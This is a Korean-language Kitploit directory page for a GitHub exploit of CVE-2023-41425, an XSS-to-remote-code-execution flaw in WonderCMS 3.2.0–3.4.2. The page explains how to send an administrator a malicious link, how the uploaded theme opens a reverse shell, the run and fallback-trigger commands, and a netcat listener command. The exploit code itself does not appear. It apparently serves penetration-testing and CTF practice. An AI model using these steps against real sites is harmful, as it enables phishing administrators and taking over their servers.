Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — XSS 인젝션, WonderCMS 3.2.0 -3.4.2 | Kitploit
도구/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
Phishing ToolsPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-41425-WonderCMS-Authenticated-RCE

XSS 인젝션, WonderCMS 3.2.0 -3.4.2

저장소 보기
11년 전아직 검토되지 않음

CVE-2023-41425-WonderCMS-Authenticated-RCE

설명

WonderCMS v3.2.0 ~ v3.4.2는 취약합니다. 원격 공격자는 XSS(Cross-Site Scripting) 익스플로잇을 사용하여 서버를 완전히 장악할 수 있습니다(교육 목적으로만 사용). 작동 방식은 다음과 같습니다:

작동 원리:

이 익스플로잇은 WonderCMS의 installModule 구성 요소를 악용하여 임의 코드를 실행하는 교묘한 스크립트를 몰래 주입합니다.

준비물

  • 도구: exploit.py
  • 필요한 것:
    • WonderCMS가 설치된 대상 URL(관리자 비밀번호 불필요).
    • 공격자 머신의 IP.
    • 리버스 셸 리스너용 포트.

단계별 실행

  1. 스크립트는 xss.js라는 파일을 생성합니다. 이 JavaScript 무기는 반사형 XSS를 악용하도록 설계되었습니다.
  2. 악성 링크를 출력합니다. 이 링크를 관리자에게 보내면 됩니다.
  3. 관리자(로그인한 사용자)가 링크를 열거나 클릭하면 마법이 일어납니다:
  • 동의 없이 백그라운드 요청이 실행됩니다.
  • 테마/플러그인 업로드 기능을 사용하여 리버스 셸 페이로드가 업로드됩니다.
  1. 업로드가 완료되면 페이로드가 실행되어 대상 서버로 바로 연결되는 리버스 셸을 제공합니다.
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

예시

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

안전장치:

리버스 셸이 자동으로 트리거되지 않으면 다음 주소로 직접 이동하세요:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

참고:

다음 명령을 사용하여 리스너를 시작하는 것을 잊지 마세요:

root@kitploit:~
nc -lvp 4444

크레딧

취약점을 발견하고 보고해 준 prodigiousMind에게 감사드립니다 https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

도구 다운로드